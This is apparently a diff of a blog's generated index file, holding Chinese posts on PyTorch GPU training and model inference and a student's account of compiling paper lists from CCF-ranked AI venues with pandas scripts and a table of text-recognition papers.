    4
    5
    for data in train_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
    imgs = imgs.cuda()
    targets = targets.cuda()
    1
    2
    3
    4
    5
    for data in test_dataloader:
    imgs, targets = data
    if torch.cuda.is_available():
    imgs = imgs.cuda()
    targets = targets.cuda()

    png

    png

    利用 GPU 训练(二)

    使用 torch.device() 设置训练用的设备:device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')

    如果有多个 gpu,可以用cuda:0 指定 0 号 gpu 等。

    将模型放到相应设备上训练:

    • myClass = myClass.to(device) 模型

    • loss_fn = loss_fn.to(device) 损失函数

    • for data in train_dataloader:    imgs, targets = data    imgs = imgs.to(device)    targets = targets.to(device)
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49

      ## 完整的模型验证套路

      利用已经训练好的模型,然后给它提供输入,得到期望的输出。

      ```python
      import torch
      import torchvision
      from PIL import Image
      from torch import nn

      image_path = '../imgs/dog.png'
      image = Image.open(image_path)
      image = image.convert('RGB')

      transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
      torchvision.transforms.ToTensor()])
      image = transform(image)
      print(image.shape)


      class MyClass(nn.Module):
      def __init__(self):
      super(MyClass, self).__init__()
      self.model = nn.Sequential(
      nn.Conv2d(3, 32, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Conv2d(32, 32, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Conv2d(32, 64, 5, padding=2),
      nn.MaxPool2d(2),
      nn.Flatten(),
      nn.Linear(1024, 64),
      nn.Linear(64, 10)
      )

      def forward(self, x):
      x = self.model(x)
      return x

      model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
      print(model)

      image = torch.reshape(image, (1, 3, 32, 32))
      model.eval()
      with torch.no_grad():
      output = model(image)
      print(output)
      print(output.argmax(1))

    读入测试图片:

    1
    2
    3
    4
    5
    6
    7
    8
    image_path = '../imgs/dog.png'
    image = Image.open(image_path)
    image = image.convert('RGB')

    transform = torchvision.transforms.Compose([torchvision.transforms.Resize((32, 32)),
    torchvision.transforms.ToTensor()])
    image = transform(image)
    print(image.shape)

    读入已经训练好的模型,map_location=torch.device('cpu')让在 cuda 上训练的模型也可以在 cpu 中测试,否则会报错:

    1
    2
    model = torch.load("myClass_0.pth", map_location=torch.device('cpu'))
    print(model)

    输出预期结果:

    1
    2
    3
    4
    5
    6
    image = torch.reshape(image, (1, 3, 32, 32))
    model.eval()
    with torch.no_grad():
    output = model(image)
    print(output)
    print(output.argmax(1))
    1
    2
    3
    tensor([[-2.7974, -0.1087,  0.5627,  1.2185,  1.4736,  1.4348,  2.3175,  1.3776,
    -3.5540, -0.6126]])
    tensor([6])

    看看开源项目

    ​ 看说明文档 README.md,一般 train.py 可以用来训练:

    ​ 训练一般有参数:【Python】Parser 通常用法 - 知乎 (zhihu.com)

    ]]>
    @@ -7656,7 +7656,7 @@ /posts/Homework-%E7%9C%8B%E5%BE%97%E5%A4%B4%E6%99%95%E7%9A%84%E6%95%B4%E7%90%86%E8%AE%BA%E6%96%87%E4%BB%BB%E5%8A%A1/ - 前言

    ​ 3.14 听完师兄师姐汇报导师觉得我们听得一头雾水,于是给了我们看期刊整理论文的任务😐……

    ​ 要求我们四个人整理完《中国计算机学会推荐国际学术会议和期刊目录》人工智能部分期刊和会议近三年的目录并从中总结出研究趋势。

    ​ 这篇博客就胡扯点完成论文干的各种事吧。

    正文

    ##《中国计算机学会推荐国际学术会议和期刊目录》

    爬虫

    ​ 分完工后还是觉得要整理的论文特别多,于是整了个爬虫代码帮忙爬目录。

    ​ 然后估计爬的太多了,爬久了就爬不动了 orz 忙活了几乎一天才爬到了一半内容 orz

    ​ 然后就发现 dblp 这个网站本身就可以批量下载目录 orz 除了超过 1000 的和期刊数太多的期刊用爬虫可能更快些。

    png

    导出 Excel

    png

    ​ 将得到的 bibtex 文件一个一个地导入进 Zotero,然后一个一个地导出成 csv 文件。

    ​ 接下来就是合并表格了,手动操作了几次后觉得太麻烦,整了个 python 代码帮我自动整理。

    import os
    import pandas as pd

    path = r'D:\Study\1st-year-master\论文目录\Conf\A\NeurlPS'
    save_file = path.split('\\')[-1]

    data = pd.DataFrame(columns=['Publication Year', 'Author', 'Title'])

    for index, file in enumerate(os.listdir(path)):
    if('.csv' in file):
    df = pd.read_csv(os.path.join(path,file))
    data = data.append(df[['Publication Year', 'Author', 'Title']])

    data.head
    write = pd.ExcelWriter(os.path.join(path,save_file) + '.xlsx') # 新建 xlsx 文件。
    data.to_excel(write, sheet_name='Sheet', index=False) # 写入文件的 Sheet1
    write.save() # 这里一定要保存

    ​ 这样每个期刊/会议近三年的目录就被整成一个 Excel 表格了😎!

    png

    统计词频

    ​ 想用 python 把这些目录的词频统计出来,这样就分析当作研究趋势了😈!于是又一阵操作猛如虎:

    import os
    import pandas as pd
    import re

    path = r'D:\Study\1st-year-master\论文目录\xlsx'
    save_path = r'D:\Study\1st-year-master\论文目录\freq'

    for index, file in enumerate(os.listdir(path)):
    if '.xlsx' in file:
    df = pd.read_excel(os.path.join(path,file))
    series = df['Title'].str.split(' ').explode().value_counts()
    data = pd.DataFrame({'Word': series.index, 'Frequent': series.values})
    write = pd.ExcelWriter(os.path.join(save_path, file) + '_frequent.xlsx') # 新建 xlsx 文件。
    data.to_excel(write, sheet_name='Sheet' + str(index), index=False) # 写入文件的 Sheet1
    write.save() # 这里一定要保存

    ​ 结果统计出来的全是 “a”、“of”、“from” 之类的,一点参考意义也没有😅……

    ​ 杰杰还搞了一个词频可视化,果然也都是一些没啥用的单词……不过突然感慨他的技术真的好全面……几乎什么都会一点。

    png

    翻译

    ​ 统计词频的计划失败后,想想还是手动检索论文吧。英文看的实在太难受,想了想有没有什么可以翻译 Excel 表格的方法……一开始想的很复杂,想先转成 markdown 文件然后传到博客上用浏览器帮忙翻译,在 Excel 表格调用有道的 API 直接翻译结果发现请求次数一上来就不让翻译了 balababala……最后伟哥说谷歌翻译可以直接上转 Excel 表格返回中文文档 orz

    png

    ​ 最后就得到了中文的论文标题目录!不知道为什么有些英文没有进行翻译。想着文件不多就手动把中英文标题整成一个表格了。

    总结

    ​ 最后大概看了一个晚上 + 一个上午吧……几万篇论文眼睛都快看花了💨,由于是主观判断研究趋势,感觉总结得也不是特别准,然后筛了点自己跟自己研究方向有点关系的论文。

    png

    最终结果

    Jounrnals

    A

    IEEE Transactions on Pattern Analysis and Machine Intelligence

    人体姿态估计、人体检测、3D 视觉、CNN、图像修复、点云、GAN、超分辨率、图像分割、视频

    • Baselines extraction from curved document images via slope fields recovery
    • Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapes
    • Shape-matching GAN++: Scale controllable dynamic artistic text style transfer
    • Unambiguous text localization, retrieval, and recognition for cluttered scenes
    • Content and style aware generation of text-line images for handwriting recognition
    • Towards end-to-end text spotting in natural scenes
    • Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive models
    • A geometrical perspective on image style transfer with adversarial learning
    • GAN inversion: A survey
    • Arbitrary shape text detection via segmentation with probability maps
    • End-to-end handwritten paragraph text recognition using a vertical attention network
    • Real-time scene text detection with differentiable binarization and adaptive scale fusion
    • A survey on vision transformer

    B

    Data & Knowledge Engineering

    建模、数据、解决某些实际问题

    IEEE Transactions on Cybernetics

    算法、信息安全、传统机器学习方法(马尔科夫链、支持向量机)

    International Journal of Approximate Reasoning

    模糊逻辑

    Machine Learning

    传统机器学习、强化学习

    Transactions of the Association for Computational Linguistics

    自然语言处理、语言学、BERT、Transformer

    C

    Applied Intelligence

    解决某些实际问题、超分辨率、模式识别、医学、COVID-19(预测、检测)、3D 视觉、CNN、图神经网络、聚类、分类、情感识别

    • Anchor-free multi-orientation text detection in natural scene images
    Computer Speech & Language

    语音识别、自然语言处理

    Expert Systems

    解决某些实际问题、医学、COVID-19、推荐系统

    IET Computer Vision

    人体姿态估计、人脸识别、目标检测、CNN、3D 视觉

    • Stroke controllable style transfer based on dilated convolutions
    • KText: Arbitrary shape text detection using modified K-Means
    International Journal of Computational Intelligence and Applications

    解决某些实际问题

    International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems

    模糊逻辑

    Machine Translation

    机器翻译

    Neural Computing and Applications

    解决某些实际问题

    • Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stage
    • SPN: short path network for scene text detection
    • Robustly detect different types of text in videos
    • Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networks
    • Historical document image binarization via style augmentation and atrous convolutions
    • Character-based handwritten text transcription with attention networks
    Pattern Recognition Letters

    模式识别(文字、医学、人体)、特征提取、GAN

    • Compressing the CNN architecture for in-air handwritten Chinese character recognition
    • LPR-Net: Recognizing Chinese license plate in complex environments
    • An attention-based row-column encoder-decoder model for text recognition in Japanese historical documents
    • Assessing similarity in handwritten texts
    • Clustering online handwritten mathematical expressions
    • Beyond visual semantics: Exploring the role of scene text in image understanding
    • PMMN: Pre-trained multi-Modal network for scene text recognition
    • RectiNet-v2: A stacked network architecture for document image dewarping
    • Transformer-based approach for joint handwriting and named entity recognition in historical document
    • Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithm
    • CE-text: A context-Aware and embedded text detector in natural scene images

    Conf

    A

    Conference on Neural Information Processing Systems

    数据集、图神经网络、算法、GAN、元学习、对比学习、强化学习、3D、Transformer

    • OmniPrint: A configurable printed character synthesizer
    • Are transformers more robust than CNNs?
    • Diffusion models beat GANs on image synthesis
    International Conference on Machine Learning

    模型攻击、算法、游戏、生成模型、元学习、强化学习、Transformer、Wasserstein 距离、强化学习

    B

    Conference on Empirical Methods in Natural Language Processing

    NLP、BERT、强化学习、文章生成摘要、文本生成、迁移学习、Transformer、数据集、COVID-19

    • Cleaning dirty books: Post-OCR processing for previously scanned texts
    International Conference on Automated Planning and Scheduling

    路径规划、强化学习

    Conference on Uncertainty in Artificial Intelligence

    马尔科夫链、贝叶斯、无监督学习、蒙特卡洛、强化学习

    C

    Asian Conference on Computer Vision

    贝叶斯、马尔可夫、3D 视觉、人体识别、GAN

    • Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regression
    Conference on Computational Natural Language Learning

    NLP

    International Conference on Algorithmic Learning Theory

    在线学习、强化学习

    International Conference on Inductive Logic Programming

    太杂太少太偏了…

    International Joint Conference on Biometrics

    安全、攻击、人脸识别

    领域有关的论文

    序号名称期刊/会议及其等级资源概要
    1Baselines extraction from curved document images via slope fields recoveryJournals Ahttps://ieeexplore.ieee.org/document/8576546提出了一种基于斜率场恢复的方法,用于从手持相机拍摄的失真文档图像中提取曲线基线
    2Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapesJournals Ahttps://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable
    https://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable-2
    研究了场景文本识别问题,该问题旨在同时检测和识别自然图像中的文本。
    3Shape-matching GAN++: Scale controllable dynamic artistic text style transferJournals Ahttps://ieeexplore.ieee.org/document/9339900
    https://openaccess.thecvf.com/content_ICCV_2019/papers/Yang_Controllable_Artistic_Text_Style_Transfer_via_Shape-Matching_GAN_ICCV_2019_paper.pdf
    探索了一个具有字形风格度控制的动态艺术文本风格转移的新问题。
    4Unambiguous text localization, retrieval, and recognition for cluttered scenesJournals Ahttps://paperswithcode.com/paper/unambiguous-text-localization-and-retrieval杂乱场景图像的中间卷积表示顺序解码为一组不同的文本实例检测。
    5Content and style aware generation of text-line images for handwriting recognitionJournals Ahttps://paperswithcode.com/paper/content-and-style-aware-generation-of-text提出了一种手写文本行图像的生成方法,该方法以视觉外观和文本内容为条件。
    6Towards end-to-end text spotting in natural scenesJournals Ahttps://paperswithcode.com/paper/towards-end-to-end-text-spotting-in-natural自然场景图像中的文本识别
    7Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive modelsJournals Ahttps://paperswithcode.com/paper/deep-generative-modelling-a-comparative生成模型综述论文
    8A geometrical perspective on image style transfer with adversarial learningJournals Ahttps://www.researchgate.net/publication/343171440_A_Geometrical_Perspective_on_Image_Style_Transfer_With_Adversarial_Learning提出了一个通用框架,用于通过微分几何的视角分析带有对抗性学习风格迁移
    9GAN inversion: A surveyJournals Ahttps://paperswithcode.com/paper/gan-inversion-a-survey涵盖了 GAN 反演的重要技术及其在图像恢复图像处理中的应用。
    10Arbitrary shape text detection via segmentation with probability mapsJournals Ahttps://paperswithcode.com/paper/arbitrary-shape-text-detection-via通过概率图提出了一种创新且稳健的基于分割的检测方法,用于准确检测文本实例。
    11End-to-end handwritten paragraph text recognition using a vertical attention networkJournals Ahttps://paperswithcode.com/paper/end-to-end-handwritten-paragraph-text不受约束的手写文本识别
    12Real-time scene text detection with differentiable binarization and adaptive scale fusionJournals Ahttps://paperswithcode.com/paper/real-time-scene-text-detection-with-1基于分割的场景文本检测方法在场景文本检测领域。提出了一个可微分二值化 (DB) 模块,该模块将二值化过程(后处理过程中最重要的步骤之一)集成到分割网络中
    13A survey on vision transformerJournals Ahttps://arxiv.org/abs/2012.12556Transformer 在计算机视觉领域的综述论文
    14Anchor-free multi-orientation text detection in natural scene imagesJournals Chttps://link.springer.com/article/10.1007/s10489-020-01742-z自然场景图像中的文本检测
    15Stroke controllable style transfer based on dilated convolutionsJournals Chttps://ietresearch.onlinelibrary.wiley.com/doi/10.1049/iet-cvi.2019.0912
    https://ietresearch.onlinelibrary.wiley.com/doi/pdfdirect/10.1049/iet-cvi.2019.0912
    风格转换任务对 VGG19 模型进行了特殊优化,作者提出利用扩张卷积来提取纹理信息,使网络具有笔画可控性
    16KText: Arbitrary shape text detection using modified K-MeansJournals Chttps://ietresearch.onlinelibrary.wiley.com/doi/10.1049/cvi2.12052
    https://ietresearch.onlinelibrary.wiley.com/doi/epdf/10.1049/cvi2.12052
    基于分组字符的文本检测方法、K-Means
    17Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stageJournals Chttps://www.researchgate.net/publication/335462030_Hybrid_HMMBLSTM_system_for_multi-script_keyword_spotting_in_printed_and_handwritten_documents_with_identification_stage提出了一种新的独立于脚本的方法,用于在印刷和手写的多脚本文档中识别单词
    18SPN: short path network for scene text detectionJournals Chttps://link.springer.com/article/10.1007/s00521-019-04093-0场景文本检测
    19Robustly detect different types of text in videosJournals Chttps://link.springer.com/article/10.1007/s00521-020-04729-6视频文本检测(叠加文本、分层文本和场景文本)
    20Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networksJournals Chttps://link.springer.com/article/10.1007/s00521-020-05556-5手写文本识别、使用 CNN 提取特征、RNN-LSTM 以编码视觉特征和解码手写图像中可用的字母序列。
    21Historical document image binarization via style augmentation and atrous convolutionsJournals Chttps://link.springer.com/article/10.1007/s00521-020-05382-9使用神经网络方法对历史文献进行二值化
    22Character-based handwritten text transcription with attention networksJournals Chttps://paperswithcode.com/paper/attention-networks-for-image-to-text使用在字符序列而非单词序列上训练的注意力编码器-解码器网络来处理手写文本识别 (HTR) 的任务
    23Compressing the CNN architecture for in-air handwritten Chinese character recognitionJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865519303502提出了一种统一的算法来有效压缩 IAHCCR 的 CNN,引入到**空中手写汉字识别(IAHCCR)**中以获得更好的识别性能。
    24LPR-Net: Recognizing Chinese license plate in complex environmentsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865518306998车牌识别网 (LPR-Net) 的端到端深度学习架构直接识别车牌
    25An attention-based row-column encoder-decoder model for text recognition in Japanese historical documentsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865520301811识别来自日本历史文档的多个文本行的输入图像,而无需对行进行显式分割。识别系统具有三个主要部分:特征提取器、行列编码器和解码器。
    26Assessing similarity in handwritten textsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865520303093合成手写风格字体
    27Clustering online handwritten mathematical expressionsJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865521001148在线手写数学表达式
    28Beyond visual semantics: Exploring the role of scene text in image understandingJournals Chttps://arxiv.org/abs/1905.10622联合使用场景文本和视觉通道来对图像进行稳健的语义解释
    29PMMN: Pre-trained multi-Modal network for scene text recognitionJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865521002622提出了一种预训练多模态网络 (PMMN),它利用视觉和语言数据分别预训练视觉模型和语言模型,以学习特定于模态的知识,以进行准确的场景文本识别
    30RectiNet-v2: A stacked network architecture for document image dewarpingJournals Chttps://arxiv.org/abs/2102.01120提出了一种端到端的 CNN 架构,该架构可以从作为输入的扭曲文档中生成无失真的文档图像
    31Transformer-based approach for joint handwriting and named entity recognition in historical documentJournals Chttps://arxiv.org/abs/2112.04189手写文档中提取相关信息
    32Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithmJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865522001490手写字符识别
    33CE-text: A context-Aware and embedded text detector in natural scene imagesJournals Chttps://www.sciencedirect.com/science/article/abs/pii/S0167865522001556提出了一种名为 CE-Text 的轻量级上下文感知深度卷积神经网络 (CNN),它适当地编码多级通道注意力信息以构建用于准确高效文本检测的判别特征图。
    34OmniPrint: A configurable printed character synthesizerConf Ahttps://paperswithcode.com/paper/omniprint-a-configurable-printed-character独立印刷字符的合成数据生成器,适用于机器学习研究
    35Are transformers more robust than CNNs?Conf Ahttps://paperswithcode.com/paper/are-transformers-more-robust-than-cnnsTransformerCNN 进行公平和深入的比较,重点是稳健性评估。
    36Diffusion models beat GANs on image synthesisConf Ahttps://paperswithcode.com/paper/diffusion-models-beat-gans-on-image-synthesis扩散模型可以实现优于当前最先进的生成模型的图像样本质量
    37Cleaning dirty books: Post-OCR processing for previously scanned textsConf Bhttps://paperswithcode.com/paper/cleaning-dirty-books-post-ocr-processing-for语言模型的改进现在可以在不考虑扫描图像本身的情况下检测和纠正 OCR 错误
    38Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regressionConf Chttps://link.springer.com/chapter/10.1007/978-3-030-69535-4_15针对任意形状的文本提出了一种基于参数化形状建模和回归方案的鲁棒场景文本检测方法
    ]]>
    + 前言

    ​ 3.14 听完师兄师姐汇报导师觉得我们听得一头雾水,于是给了我们看期刊整理论文的任务😐……

    ​ 要求我们四个人整理完《中国计算机学会推荐国际学术会议和期刊目录》人工智能部分期刊和会议近三年的目录并从中总结出研究趋势。

    ​ 这篇博客就胡扯点完成论文干的各种事吧。

    正文

    ##《中国计算机学会推荐国际学术会议和期刊目录》

    爬虫

    ​ 分完工后还是觉得要整理的论文特别多,于是整了个爬虫代码帮忙爬目录。

    ​ 然后估计爬的太多了,爬久了就爬不动了 orz 忙活了几乎一天才爬到了一半内容 orz

    ​ 然后就发现 dblp 这个网站本身就可以批量下载目录 orz 除了超过 1000 的和期刊数太多的期刊用爬虫可能更快些。

    png

    导出 Excel

    png

    ​ 将得到的 bibtex 文件一个一个地导入进 Zotero,然后一个一个地导出成 csv 文件。

    ​ 接下来就是合并表格了,手动操作了几次后觉得太麻烦,整了个 python 代码帮我自动整理。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import os
    import pandas as pd

    path = r'D:\Study\1st-year-master\论文目录\Conf\A\NeurlPS'
    save_file = path.split('\\')[-1]

    data = pd.DataFrame(columns=['Publication Year', 'Author', 'Title'])

    for index, file in enumerate(os.listdir(path)):
    if('.csv' in file):
    df = pd.read_csv(os.path.join(path,file))
    data = data.append(df[['Publication Year', 'Author', 'Title']])

    data.head
    write = pd.ExcelWriter(os.path.join(path,save_file) + '.xlsx') # 新建 xlsx 文件。
    data.to_excel(write, sheet_name='Sheet', index=False) # 写入文件的 Sheet1
    write.save() # 这里一定要保存

    ​ 这样每个期刊/会议近三年的目录就被整成一个 Excel 表格了😎!

    png

    统计词频

    ​ 想用 python 把这些目录的词频统计出来,这样就分析当作研究趋势了😈!于是又一阵操作猛如虎:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import os
    import pandas as pd
    import re

    path = r'D:\Study\1st-year-master\论文目录\xlsx'
    save_path = r'D:\Study\1st-year-master\论文目录\freq'

    for index, file in enumerate(os.listdir(path)):
    if '.xlsx' in file:
    df = pd.read_excel(os.path.join(path,file))
    series = df['Title'].str.split(' ').explode().value_counts()
    data = pd.DataFrame({'Word': series.index, 'Frequent': series.values})
    write = pd.ExcelWriter(os.path.join(save_path, file) + '_frequent.xlsx') # 新建 xlsx 文件。
    data.to_excel(write, sheet_name='Sheet' + str(index), index=False) # 写入文件的 Sheet1
    write.save() # 这里一定要保存

    ​ 结果统计出来的全是 “a”、“of”、“from” 之类的,一点参考意义也没有😅……

    ​ 杰杰还搞了一个词频可视化,果然也都是一些没啥用的单词……不过突然感慨他的技术真的好全面……几乎什么都会一点。

    png

    翻译

    ​ 统计词频的计划失败后,想想还是手动检索论文吧。英文看的实在太难受,想了想有没有什么可以翻译 Excel 表格的方法……一开始想的很复杂,想先转成 markdown 文件然后传到博客上用浏览器帮忙翻译,在 Excel 表格调用有道的 API 直接翻译结果发现请求次数一上来就不让翻译了 balababala……最后伟哥说谷歌翻译可以直接上转 Excel 表格返回中文文档 orz

    png

    ​ 最后就得到了中文的论文标题目录!不知道为什么有些英文没有进行翻译。想着文件不多就手动把中英文标题整成一个表格了。

    总结

    ​ 最后大概看了一个晚上 + 一个上午吧……几万篇论文眼睛都快看花了💨,由于是主观判断研究趋势,感觉总结得也不是特别准,然后筛了点自己跟自己研究方向有点关系的论文。

    png

    最终结果

    Jounrnals

    A

    IEEE Transactions on Pattern Analysis and Machine Intelligence

    人体姿态估计、人体检测、3D 视觉、CNN、图像修复、点云、GAN、超分辨率、图像分割、视频

    • Baselines extraction from curved document images via slope fields recovery
    • Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapes
    • Shape-matching GAN++: Scale controllable dynamic artistic text style transfer
    • Unambiguous text localization, retrieval, and recognition for cluttered scenes
    • Content and style aware generation of text-line images for handwriting recognition
    • Towards end-to-end text spotting in natural scenes
    • Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive models
    • A geometrical perspective on image style transfer with adversarial learning
    • GAN inversion: A survey
    • Arbitrary shape text detection via segmentation with probability maps
    • End-to-end handwritten paragraph text recognition using a vertical attention network
    • Real-time scene text detection with differentiable binarization and adaptive scale fusion
    • A survey on vision transformer

    B

    Data & Knowledge Engineering

    建模、数据、解决某些实际问题

    IEEE Transactions on Cybernetics

    算法、信息安全、传统机器学习方法(马尔科夫链、支持向量机)

    International Journal of Approximate Reasoning

    模糊逻辑

    Machine Learning

    传统机器学习、强化学习

    Transactions of the Association for Computational Linguistics

    自然语言处理、语言学、BERT、Transformer

    C

    Applied Intelligence

    解决某些实际问题、超分辨率、模式识别、医学、COVID-19(预测、检测)、3D 视觉、CNN、图神经网络、聚类、分类、情感识别

    • Anchor-free multi-orientation text detection in natural scene images
    Computer Speech & Language

    语音识别、自然语言处理

    Expert Systems

    解决某些实际问题、医学、COVID-19、推荐系统

    IET Computer Vision

    人体姿态估计、人脸识别、目标检测、CNN、3D 视觉

    • Stroke controllable style transfer based on dilated convolutions
    • KText: Arbitrary shape text detection using modified K-Means
    International Journal of Computational Intelligence and Applications

    解决某些实际问题

    International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems

    模糊逻辑

    Machine Translation

    机器翻译

    Neural Computing and Applications

    解决某些实际问题

    • Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stage
    • SPN: short path network for scene text detection
    • Robustly detect different types of text in videos
    • Effective offline handwritten text recognition model based on a sequence-to-sequence approach with CNN-RNN networks
    • Historical document image binarization via style augmentation and atrous convolutions
    • Character-based handwritten text transcription with attention networks
    Pattern Recognition Letters

    模式识别(文字、医学、人体)、特征提取、GAN

    • Compressing the CNN architecture for in-air handwritten Chinese character recognition
    • LPR-Net: Recognizing Chinese license plate in complex environments
    • An attention-based row-column encoder-decoder model for text recognition in Japanese historical documents
    • Assessing similarity in handwritten texts
    • Clustering online handwritten mathematical expressions
    • Beyond visual semantics: Exploring the role of scene text in image understanding
    • PMMN: Pre-trained multi-Modal network for scene text recognition
    • RectiNet-v2: A stacked network architecture for document image dewarping
    • Transformer-based approach for joint handwriting and named entity recognition in historical document
    • Cross lingual handwritten character recognition using long short term memory network with aid of elephant herding optimization algorithm
    • CE-text: A context-Aware and embedded text detector in natural scene images

    Conf

    A

    Conference on Neural Information Processing Systems

    数据集、图神经网络、算法、GAN、元学习、对比学习、强化学习、3D、Transformer

    • OmniPrint: A configurable printed character synthesizer
    • Are transformers more robust than CNNs?
    • Diffusion models beat GANs on image synthesis
    International Conference on Machine Learning

    模型攻击、算法、游戏、生成模型、元学习、强化学习、Transformer、Wasserstein 距离、强化学习

    B

    Conference on Empirical Methods in Natural Language Processing

    NLP、BERT、强化学习、文章生成摘要、文本生成、迁移学习、Transformer、数据集、COVID-19

    • Cleaning dirty books: Post-OCR processing for previously scanned texts
    International Conference on Automated Planning and Scheduling

    路径规划、强化学习

    Conference on Uncertainty in Artificial Intelligence

    马尔科夫链、贝叶斯、无监督学习、蒙特卡洛、强化学习

    C

    Asian Conference on Computer Vision

    贝叶斯、马尔可夫、3D 视觉、人体识别、GAN

    • Accurate arbitrary-shaped scene text detection via iterative polynomial parameter regression
    Conference on Computational Natural Language Learning

    NLP

    International Conference on Algorithmic Learning Theory

    在线学习、强化学习

    International Conference on Inductive Logic Programming

    太杂太少太偏了…

    International Joint Conference on Biometrics

    安全、攻击、人脸识别

    领域有关的论文

    序号名称期刊/会议及其等级资源概要
    1Baselines extraction from curved document images via slope fields recoveryJournals Ahttps://ieeexplore.ieee.org/document/8576546提出了一种基于斜率场恢复的方法,用于从手持相机拍摄的失真文档图像中提取曲线基线
    2Mask TextSpotter: An end-to-end trainable neural network for spotting text with arbitrary shapesJournals Ahttps://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable
    https://paperswithcode.com/paper/mask-textspotter-an-end-to-end-trainable-2
    研究了场景文本识别问题,该问题旨在同时检测和识别自然图像中的文本。
    3Shape-matching GAN++: Scale controllable dynamic artistic text style transferJournals Ahttps://ieeexplore.ieee.org/document/9339900
    https://openaccess.thecvf.com/content_ICCV_2019/papers/Yang_Controllable_Artistic_Text_Style_Transfer_via_Shape-Matching_GAN_ICCV_2019_paper.pdf
    探索了一个具有字形风格度控制的动态艺术文本风格转移的新问题。
    4Unambiguous text localization, retrieval, and recognition for cluttered scenesJournals Ahttps://paperswithcode.com/paper/unambiguous-text-localization-and-retrieval杂乱场景图像的中间卷积表示顺序解码为一组不同的文本实例检测。
    5Content and style aware generation of text-line images for handwriting recognitionJournals Ahttps://paperswithcode.com/paper/content-and-style-aware-generation-of-text提出了一种手写文本行图像的生成方法,该方法以视觉外观和文本内容为条件。
    6Towards end-to-end text spotting in natural scenesJournals Ahttps://paperswithcode.com/paper/towards-end-to-end-text-spotting-in-natural自然场景图像中的文本识别
    7Deep generative modelling: A comparative review of VAEs, GANs, normalizing flows, energy-based and autoregressive modelsJournals Ahttps://paperswithcode.com/paper/deep-generative-modelling-a-comparative生成模型综述论文
    8A geometrical perspective on image style transfer with adversarial learningJournals Ahttps://www.researchgate.net/publication/343171440_A_Geometrical_Perspective_on_Image_Style_Transfer_With_Adversarial_Learning提出了一个通用框架,用于通过微分几何的视角分析带有对抗性学习风格迁移
    9GAN inversion: A surveyJournals Ahttps://paperswithcode.com/paper/gan-inversion-a-survey涵盖了 GAN 反演的重要技术及其在图像恢复图像处理中的应用。
    10Arbitrary shape text detection via segmentation with probability mapsJournals Ahttps://paperswithcode.com/paper/arbitrary-shape-text-detection-via通过概率图提出了一种创新且稳健的基于分割的检测方法,用于准确检测文本实例。
    11End-to-end handwritten paragraph text recognition using a vertical attention networkJournals Ahttps://paperswithcode.com/paper/end-to-end-handwritten-paragraph-text不受约束的手写文本识别
    12Real-time scene text detection with differentiable binarization and adaptive scale fusionJournals Ahttps://paperswithcode.com/paper/real-time-scene-text-detection-with-1基于分割的场景文本检测方法在场景文本检测领域。提出了一个可微分二值化 (DB) 模块,该模块将二值化过程(后处理过程中最重要的步骤之一)集成到分割网络中
    13A survey on vision transformerJournals Ahttps://arxiv.org/abs/2012.12556Transformer 在计算机视觉领域的综述论文
    14Anchor-free multi-orientation text detection in natural scene imagesJournals Chttps://link.springer.com/article/10.1007/s10489-020-01742-z自然场景图像中的文本检测
    15Stroke controllable style transfer based on dilated convolutionsJournals Chttps://ietresearch.onlinelibrary.wiley.com/doi/10.1049/iet-cvi.2019.0912
    https://ietresearch.onlinelibrary.wiley.com/doi/pdfdirect/10.1049/iet-cvi.2019.0912
    风格转换任务对 VGG19 模型进行了特殊优化,作者提出利用扩张卷积来提取纹理信息,使网络具有笔画可控性
    16KText: Arbitrary shape text detection using modified K-MeansJournals Chttps://ietresearch.onlinelibrary.wiley.com/doi/10.1049/cvi2.12052
    https://ietresearch.onlinelibrary.wiley.com/doi/epdf/10.1049/cvi2.12052
    基于分组字符的文本检测方法、K-Means
    17Hybrid HMM/BLSTM system for multi-script keyword spotting in printed and handwritten documents with identification stageJournals Chttps://www.researchgate.net/publication/335462030_Hybrid_HMMBLSTM_system_for_multi-script_keyword_spotting_in_printed_and_handwritten_documents_with_identification_stage提出了一种新的独立于脚本的方法,用于在印刷和手写的多脚本文档中识别单词
